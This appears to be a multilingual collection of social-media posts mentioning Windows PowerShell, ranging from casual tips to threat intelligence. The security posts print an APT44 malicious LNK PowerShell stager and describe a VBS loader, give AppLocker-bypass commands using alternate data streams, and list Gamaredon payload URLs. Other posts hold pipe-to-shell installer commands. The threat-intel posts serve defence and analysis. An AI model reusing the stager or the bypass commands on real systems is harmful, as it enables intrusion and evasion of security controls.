Windows版Linux実行画面であるらしい WindowsPowerShellで MilkVを認識させる事に成功！ ssh root@192.168.42.1 とやってYesと入力して、その後に パスワードを【milkv】とすると、 パソコン側ではなくMilkV側のLinux実行画面に移動する

Ini ditaro di C:\Users\<user>\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 dan C:\Users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Cara, é muito complicado ser dono de algo, é um mundo dos cruéis, desde que eu subir um produto há 3 anos, tentam me foder de todas maneiras. Ainda mais que quando esse sistema nasceu era extremamente leigo em programação, não tinha IA, e segurança era pior ainda. Hoje de novo, tentaram me pescar, com uma proposta tentadora, com um perfil completamente falso, com foto, descrição, link do site. A empresa existe, eles se passaram por ela, eu quase abrir o arquivo no automático, mas o windows aviso e eu olhei a extensão depois. Depois que eu xinguei a pessoa, ele apagou todos os arquivos, eu nem tive coragem de baixar o outro, mas eu joguei no chatgpt o arquivo e ele fez uma decrypt no arquivo e me mandou isso: "Sim — é malicioso. O arquivo .vbs é um loader/dropper ofuscado que tenta iniciar PowerShell oculto para baixar e carregar outro payload." Arquivo analisado Tipo: VBScript .vbs Tamanho: ~1,26 MB SHA-256: 1131f6aef49096b03746059892e4ee8313d22cbe27d29937e1107d2f6f47e849 MD5: eaaa52623c49b38ffa16826c7b1b4a9d Tem ~26.886 linhas falsas repetidas para esconder o código real. Comportamento Cria WScript.Shell. Executa PowerShell escondido via: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -Command ... Decodifica um script Base64 em Unicode e executa com iex. O PowerShell baixa dados de: res.cloudinary.com/dnutn6jzk… Esses dias eu acabei caindo em um malware que postei aqui. Tá complicado.

UNC6671's BlackFile extortion operation targets cloud environments via vishing calls and AiTM attacks. Active since early 2026, compromising dozens of orgs across North America 🇺🇸, Australia 🇦🇺, and UK 🇬🇧 through sophisticated SSO bypass techniques. Attack methodology: • Vishing calls to personal phones impersonating IT, directing victims to lookalike domains (enrollms[.]com, passkeyms[.]com) for real-time credential harvest • AiTM bypass of MFA through live call coordination, immediate attacker device registration for persistence • Programmatic data theft via Python/PowerShell scripts targeting M365/Okta, using direct HTTP GET against document URLs with stolen FedAuth cookies • FileAccessed events instead of FileDownloaded to evade SOC detection - one case exfiltrated 1M files Key forensic artifacts: • User-Agent mismatches: ClientAppId spoofed as "Microsoft Office" but UserAgent shows python-requests/2.28.1 or WindowsPowerShell/5.1 • Authentication from commercial VPN/hosting provider IPs • High-volume file access patterns inconsistent with human browsing • system.multifactor.factor.setup events preceded by MFA failures Extortion escalation includes Gmail spam campaigns, threatening voicemails to C-suite, and swatting tactics. BlackFile DLS shut down April 2026 with message "shutting down... under this name" - likely rebranding rather than cessation. Hunt for FileAccessed events with scripting User-Agents from suspicious IPs. #DFIR_Radar

A sophisticated multi-stage infection chain originating from a malicious ZIP archive titled Iskhod_7582_Predstavlenie_na_naznachenie.zip. The campaign, attributed to the Russian state-sponsored group APT44, leverages deceptive file naming and complex PowerShell obfuscation to bypass traditional defenses. The attack begins with a phishing email containing the ZIP archive. Inside, users find what appears to be a PDF document but is actually a Windows Shortcut (LNK) file. The Chain of Infection: Deceptive LNK: The user double-clicks a file disguised with a Microsoft Edge icon. PowerShell Pivot: The LNK executes a command that uses where.exe to find itself on the disk. Hidden Staging: It extracts a hidden stage into the %APPDATA% directory, specifically utilizing a faux $RECYCLE.BIN folder to evade manual inspection. Final Payload: A file named currentSessionTrigger is read and executed in a hidden window, establishing a remote connection to the attacker's infrastructure. Malicious Command Execution The core malicious activity is driven by a complex PowerShell command executed via the LNK file: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $firstSummaryTitle=(where.exe /r $env:USERPROFILE 'Iskhod_7582_Predstavlenie_na_naznachenie.zip') | select -First 1; $totalValueThreshold=$firstSummaryTitle.Trim(); Expand-Archive $totalValueThreshold -D $env:APPDATA\uuidPeriod; $totalValueThreshold=$env:APPDATA '\uuidPeriod\$RECYCLE.BIN\employeeTrigger'; $permanentLicenseRate=$totalValueThreshold '.zip'; ren $totalValueThreshold -N $permanentLicenseRate; Expand-Archive $permanentLicenseRate -D $env:APPDATA\outlook; $mainDataType=gc $env:APPDATA\outlook\currentSessionTrigger; Start-Process -Wi Hidden powershell $mainDataType Hash 2156c270ffe8e4b23b67efed191b9737 #CyberSecurity #APT44 #Sandworm #MalwareAlert #ThreatIntel

アークナイツやって爆睡してたおはよう解説するわ まず正確な時間にイベントが開始されるのは「パッチ」という機能があるパッチとは起動するプログラムを時間を指定して流す機能である。代表的なものだとWindowsPowerShell パッチを今回のSQLとJavaファイルをJDBCというAPIで紐付けられている

🛡️ OSEP: Bypassing AppLocker with Alternate Data Streams AppLocker can block execution of scripts and binaries, but Windows Alternate Data Streams (ADS) provide a clever bypass. Instead of running PowerShell directly, create an ADS containing your script and execute it via wmic or rundll32. EXAMPLE: Create a malicious PowerShell script in ADS: echo Get-Process > normal.txt:evil.ps1 Execute it using wmic: wmic process call create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -f normal.txt:evil.ps1" This technique works because AppLocker rules typically target file extensions and known paths, not ADS. For OSEP labs, always check for AppLocker policies with Get-AppLockerPolicy, then explore ADS, registry-based execution, or trusted publisher certificates as alternatives. What's your favorite AppLocker bypass method? Share in the replies. #OSEP #pentesting #cybersecurity #OSCP #OSWE

シスコが青くなった（水色） ここは逆張りで、オレンジ、黄色、キャラメル、ベージュ等の補色を使って、青のアイコンから浮かび上がるようにしよう \(^^)/ VSCode, Zoom, WindowsPowershell, Word, などみんなアイコンが青くて識別が困難なのだ！ 老害仕草

なんらかの申告を終えて、お仕事ラッシュの完了も併せて、何か月ぶりかに気が抜けたー。 なんらかの申告、ChatGPTで、OCR済PDFファイル（紙はScansnapでスキャン）のファイル名を適切に変更するPythonスクリプトをVer.11まで作りながら、WindowsPowerShellでバチバチ実行して、中間ファイルだけ人力チェック、再び別のスクリプト処理を繰り返したら、超効率。 定型事務処理って、こうやって自動化するんだなぁ。なるほど。

Windowsの更新プログラム消せた～のでメモ WindowsPowerShellで、この順番通り削除 KB5077181→KB5074105→KB5078127→KB5074109 書き方はこれ 例) wusa /uninstall /kb:5077181 実行してエラーになったら、再起動して再度コマンド実行すると解消しました。

コンピュータを再起動して 余計なアプリケーションを閉じた状態で WindowsPowershellを検索し(右クリック管理者権限で起動) wusa /uninstall /kb:5074109 上記のコマンド打って試してみてください。

// DEPLOYMENT PROTOCOLS WINDOWSPOWERSHELL ADMIN iwr -useb openzero.talktoai.org/instal… | iex Full Stack: Installs AnythingLLM, Python, Zero Core, & GUI. LINUX MINT / UBUNTUBASH curl -fsSL openzero.talktoai.org/instal… | bash Optimized for Mint/Cinnamon. Handles sudo & venv. DEBIAN SERVERHEADLESS curl -fsSL openzero.talktoai.org/instal… | bash Lightweight. No GUI. Perfect for VPS/Droplets.

Windowsを使っているとまじで PowerShellとWindowsPowerShellとcmdで勝手が違うところでキレそうになる なんやねんおまえら

User-Agent: UA WindowsPowerShell 86.54.42(.)149/zo4nik/examplemusic-making[.]ps1 86.54.42(.)149/zo4nik/controversysit[.]ps1 86.54.42(.)149/zo4nik/dumprip[.]ps1 AS42624 Global-Data System IT Corporation 🇸🇨

"UA WindowsPowerShell" 😂 🤷‍♂️

Buenas probá en el PowerShell como admin pegar esto antes de reiniciar: [Environment]::SetEnvironmentVariable("Path", "C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Common Files\Microsoft Shared\;C:\dev\vcpkg;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps", "Machine") Quizás lo soluciona

User-Agent: UA WindowsPowerShell 5[.]8[.]19[.]46/krajj4/foldstring[.]ps1 5[.]8[.]19[.]46/krajj4/scowsoutheast[.]ps1 AS42474 SmartApe OU 🇮🇱

User-Agent: UA WindowsPowerShell 146[.]185[.]239[.]63/k4s/ospreybonfire[.]ps1 146[.]185[.]239[.]63/k4s/violabanner[.]ps1 AS63023 GLOBALTELEHOST 🇪🇸 #Gamaredon